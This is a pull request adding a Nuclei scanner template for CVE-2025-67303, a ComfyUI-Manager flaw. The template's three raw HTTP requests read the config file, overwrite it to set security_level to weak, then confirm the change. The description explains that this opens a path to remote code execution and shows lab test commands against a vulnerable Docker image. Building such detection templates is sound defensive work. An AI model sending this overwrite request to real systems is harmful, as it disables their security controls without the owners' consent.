### PR TITLE
Add CVE-2025-67303 - ComfyUI-Manager Config Overwrite to RCE

### DIFF
--- a/http/cves/2025/CVE-2025-67303.yaml
+++ b/http/cves/2025/CVE-2025-67303.yaml
@@ -1,0 +1,65 @@
+id: CVE-2025-67303
+
+info:
+  name: ComfyUI-Manager < 3.38 - Configuration Overwrite to Security Bypass
+  author: maciejklimek
+  severity: critical
+  description: |
+    ComfyUI-Manager prior to version 3.38 stores its configuration under the unprotected user/default/ComfyUI-Manager/ directory, which is accessible via ComfyUI's /userdata/ web API without authentication. An attacker can read and overwrite config.ini to set security_level to weak, disabling all security restrictions. Combined with service restart and malicious custom node installation, this leads to remote code execution.
+  reference:
+    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
+    - https://github.com/Comfy-Org/ComfyUI-Manager/pull/2338/commits/e44c5cef58fb4973670b86433b9d24d077b44a26
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-67303
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-67303
+    cwe-id: CWE-420
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: comfy-org
+    product: comfyui-manager
+    shodan-query: http.title:"ComfyUI"
+  tags: cve,cve2025,comfyui,comfyui-manager,rce,config-overwrite
+
+http:
+  - raw:
+      - |
+        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/octet-stream
+
+        [default]
+        security_level = weak
+      - |
+        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_1
+        words:
+          - "security_level"
+          - "[default]"
+        condition: and
+
+      - type: word
+        part: body_3
+        words:
+          - "security_level = weak"
+
+      - type: status
+        part: header_1
+        status:
+          - 200
+
+      - type: status
+        part: header_3
+        status:
+          - 200

--- a/http/cves/2025/CVE-2025-67303.yaml
+++ b/http/cves/2025/CVE-2025-67303.yaml
@@ -1,15 +1,19 @@
 id: CVE-2025-67303
 
 info:
-  name: ComfyUI-Manager < 3.38 - Configuration Overwrite to Security Bypass
+  name: ComfyUI-Manager < 3.38 - Configuration Overwrite
   author: maciejklimek
   severity: critical
   description: |
-    ComfyUI-Manager prior to version 3.38 stores its configuration under the unprotected user/default/ComfyUI-Manager/ directory, which is accessible via ComfyUI's /userdata/ web API without authentication. An attacker can read and overwrite config.ini to set security_level to weak, disabling all security restrictions. Combined with service restart and malicious custom node installation, this leads to remote code execution.
+    ComfyUI-Manager < 3.38 contains an insecure file storage vulnerability caused by storing files in an insufficiently protected location accessible via the web interface, letting remote attackers manipulate configuration and critical data, exploit requires web access.
+  impact: |
+    Remote attackers can manipulate configuration and critical data, potentially compromising application integrity and security.
+  remediation: |
+    Update to version 3.38 or later.
   reference:
     - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
-    - https://github.com/Comfy-Org/ComfyUI-Manager/pull/2338/commits/e44c5cef58fb4973670b86433b9d24d077b44a26
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-67303
+    - https://github.com/vulhub/vulhub/blob/master/comfyui/CVE-2025-67303/README.md
+    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -21,13 +25,14 @@ info:
     vendor: comfy-org
     product: comfyui-manager
     shodan-query: http.title:"ComfyUI"
-  tags: cve,cve2025,comfyui,comfyui-manager,rce,config-overwrite
+  tags: cve,cve2025,comfyui,comfyui-manager,intrusive,vuln
 
 http:
   - raw:
       - |
         GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
         Host: {{Hostname}}
+
       - |
         POST /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
         Host: {{Hostname}}
@@ -35,31 +40,15 @@ http:
 
         [default]
         security_level = weak
+
       - |
         GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
         Host: {{Hostname}}
 
-    req-condition: true
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body_1
-        words:
-          - "security_level"
-          - "[default]"
+      - type: dsl
+        dsl:
+          - "contains_all(body_1, '[default]', 'security_level')"
+          - "contains(body_3, 'security_level = weak')"
+          - "status_code_1 == 200 && status_code_3 == 200"
         condition: and
-
-      - type: word
-        part: body_3
-        words:
-          - "security_level = weak"
-
-      - type: status
-        part: header_1
-        status:
-          - 200
-
-      - type: status
-        part: header_3
-        status:
-          - 200


### PR DESCRIPTION
### PR Information

- Added CVE-2025-67303 — ComfyUI-Manager < 3.38 Configuration Overwrite to Security Bypass (leading to RCE)
- References: https://nvd.nist.gov/vuln/detail/CVE-2025-67303, https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Multi-step exploitation PoC (3 requests):
1. Read config via `/userdata/ComfyUI-Manager%2Fconfig.ini` (confirms `security_level` + `[default]`)
2. Overwrite config to set `security_level = weak`
3. Re-read config to verify overwrite succeeded

Tested with `nuclei -debug`:
```
docker run -d -p 8188:8188 vulhub/comfyui:3.37-with-manager
# Wait ~10s
nuclei -t CVE-2025-67303.yaml -u http://localhost:8188
# Result: 4 matches (word-1, word-2, status-3, status-4)
```

Matchers: config content verification (pre/post overwrite) + HTTP 200 status codes.